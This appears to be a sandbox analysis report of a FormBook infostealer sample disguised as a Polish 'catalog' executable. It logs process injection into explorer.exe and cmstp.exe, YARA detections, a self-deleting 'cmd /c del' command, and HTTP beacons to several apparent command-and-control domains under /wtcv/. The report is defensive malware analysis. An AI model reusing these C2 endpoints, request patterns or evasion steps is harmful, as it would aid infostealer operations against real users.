                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.649770217.160.0.3380C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:49:20.590734005 CET7551OUTGET /wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw== HTTP/1.1
                                                Host: www.iccsukltd.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:20.613830090 CET7552INHTTP/1.1 302 Moved Temporarily
                                                Server: nginx
                                                Date: Thu, 04 Nov 2021 10:49:20 GMT
                                                Content-Type: text/html
                                                Content-Length: 138
                                                Connection: close
                                                Location: https://www.iccsukltd.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw==
                                                Expires: Thu, 04 Nov 2021 11:09:20 GMT
                                                Cache-Control: max-age=1200
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.649773153.127.214.20680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:49:26.412220001 CET7561OUTGET /wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.harada-insatsu.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:27.061523914 CET7561INHTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Thu, 04 Nov 2021 10:49:26 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 0
                                                Connection: close
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://harada-insatsu.com/wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.649774172.67.184.15680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:49:36.988871098 CET7563OUTGET /wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.affiliatemarketingproducts.xyz
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:37.027247906 CET7564INHTTP/1.1 301 Moved Permanently
                                                Date: Thu, 04 Nov 2021 10:49:37 GMT
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Thu, 04 Nov 2021 11:49:37 GMT
                                                Location: https://www.affiliatemarketingproducts.xyz/wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SPswaYNzBNI3Kt4mtbfGsNGfaa%2FkZUQW2IRP4os7vY69Hkz9OlKNWJOADCzrBTJzBOFhRTVCuWC4G%2FBpJgHLPTtPcRGkhO%2B8zEWipfS%2BaMIRKeeVD0wb5edUjB31NBc2rZfYdeH8pNowyK5alp3qulaeUFLI"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 6a8d46d64fc84c5b-AMS
                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.649776104.248.163.18780C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:49:47.179642916 CET7569OUTGET /wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.bezhantrading.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:47.760755062 CET7570INHTTP/1.1 301 Moved Permanently
                                                Connection: close
                                                content-type: text/html; charset=UTF-8
                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                cache-control: no-cache, must-revalidate, max-age=0
                                                x-redirect-by: WordPress
                                                location: http://bezhantrading.com/wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0
                                                content-length: 0
                                                date: Thu, 04 Nov 2021 10:49:47 GMT
                                                server: LiteSpeed
                                                vary: User-Agent


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.64977746.38.243.23480C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:49:52.756943941 CET7571OUTGET /wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA== HTTP/1.1
                                                Host: www.alles-abgedeckt.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:52.781173944 CET7571INHTTP/1.1 404 Not Found
                                                Date: Thu, 04 Nov 2021 10:48:29 GMT
                                                Server: Apache/2.4.10 (Debian)
                                                Content-Length: 285
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 6c 6c 65 73 2d 61 62 67 65 64 65 63 6b 74 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.alles-abgedeckt.com Port 80</address></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                7192.168.2.649778138.68.74.11680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:49:57.904726028 CET7572OUTGET /wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.leads-mania.club
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:57.947346926 CET7573INHTTP/1.1 301 Moved Permanently
                                                Date: Thu, 04 Nov 2021 10:49:57 GMT
                                                Server: Apache/2.4.18 (Ubuntu)
                                                Location: https://www.leads-mania.club/wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0
                                                Content-Length: 432
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 65 61 64 73 2d 6d 61 6e 69 61 2e 63 6c 75 62 2f 77 74 63 76 2f 3f 36 6c 70 44 3d 36 75 61 64 46 2f 78 74 70 36 53 49 45 5a 58 52 65 6a 63 35 65 45 67 71 71 69 64 61 38 31 4c 79 63 65 72 30 37 38 77 75 61 71 73 6b 42 48 37 2b 59 39 42 48 58 54 4f 38 68 70 44 48 56 50 35 32 53 58 62 63 74 30 4f 31 47 77 3d 3d 26 61 6d 70 3b 67 32 4d 4c 3d 63 72 42 4c 65 66 66 68 50 68 48 30 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 65 61 64 73 2d 6d 61 6e 69 61 2e 63 6c 75 62 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.leads-mania.club/wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&amp;g2ML=crBLeffhPhH0">here</a>.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.leads-mania.club Port 80</address></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                8192.168.2.64977935.246.6.10980C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 4, 2021 11:50:03.434360027 CET7574OUTGET /wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg== HTTP/1.1
                                                Host: www.tankomixing.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:50:03.508599043 CET7576INHTTP/1.1 404 Not Found
                                                Date: Thu, 04 Nov 2021 10:50:03 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 2963
                                                Connection: close
                                                x-wix-request-id: 1636023003.449130355506120675
                                                Age: 0
                                                Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjVnh5Kklh0tOjeXRNYui2I,qquldgcFrj2n046g4RNSVOc9uRR3b9ESRFQmutE6otVYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRalt5/ToY82z3f1Iadd1mDV+wfoIgWdv1pdEYpwcIu9suB3fKEXQvQlSAkB/lstal9R17zYLyYyrK+fg616qIKE8c=,2UNV7KOq4oGjA5+PKsX47IJCkNcL1UXXT2AxlbYijuBYgeUJqUXtid+86vZww+nL,2+8df7/86SpxIBpm+VHpf+i/fkkIKkD/fZgnosx7etd9pAiCxHhredE3m8SaSeMp,l7Ey5khejq81S7sxGe5NkxC4MYanLpg+PuBnb2R7HRGTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,9y9YchCOVZDNGbMpBN9NeuuXxLvkVaG5VQb5mydxWWiYfoPtReGns7o6BqA+77AHvGQ2Otd3B2C27oTTIAKJtQ==
                                                Vary: Accept-Encoding
                                                X-Content-Type-Options: nosniff
                                                Server: Pepyaka/1.19.10
                                                Data Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f
                                                Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robo


                                                Code Manipulations

                                                Statistics

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                Analysis Process: nowy przyk#U0142adowy katalog.exe PID: 6524 Parent PID: 5860

                                                General

                                                Start time:11:47:59
                                                Start date:04/11/2021
                                                Path:C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
                                                Imagebase:0x400000
                                                File size:422298 bytes
                                                MD5 hash:CBE0E49106FAD96B2C1C155CE5B22ABD
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Analysis Process: nowy przyk#U0142adowy katalog.exe PID: 6596 Parent PID: 6524

                                                General

                                                Start time:11:48:01
                                                Start date:04/11/2021
                                                Path:C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
                                                Imagebase:0x400000
                                                File size:422298 bytes
                                                MD5 hash:CBE0E49106FAD96B2C1C155CE5B22ABD
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Analysis Process: explorer.exe PID: 3440 Parent PID: 6596

                                                General

                                                Start time:11:48:05
                                                Start date:04/11/2021
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff6f22f0000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Analysis Process: cmstp.exe PID: 5596 Parent PID: 3440

                                                General

                                                Start time:11:48:30
                                                Start date:04/11/2021
                                                Path:C:\Windows\SysWOW64\cmstp.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                Imagebase:0xd0000
                                                File size:82944 bytes
                                                MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                Analysis Process: cmd.exe PID: 5632 Parent PID: 5596

                                                General

                                                Start time:11:48:35
                                                Start date:04/11/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
                                                Imagebase:0x2a0000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Analysis Process: conhost.exe PID: 5548 Parent PID: 5632

                                                General

                                                Start time:11:48:36
                                                Start date:04/11/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff61de10000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Disassembly

                                                Code Analysis

                                                Reset < >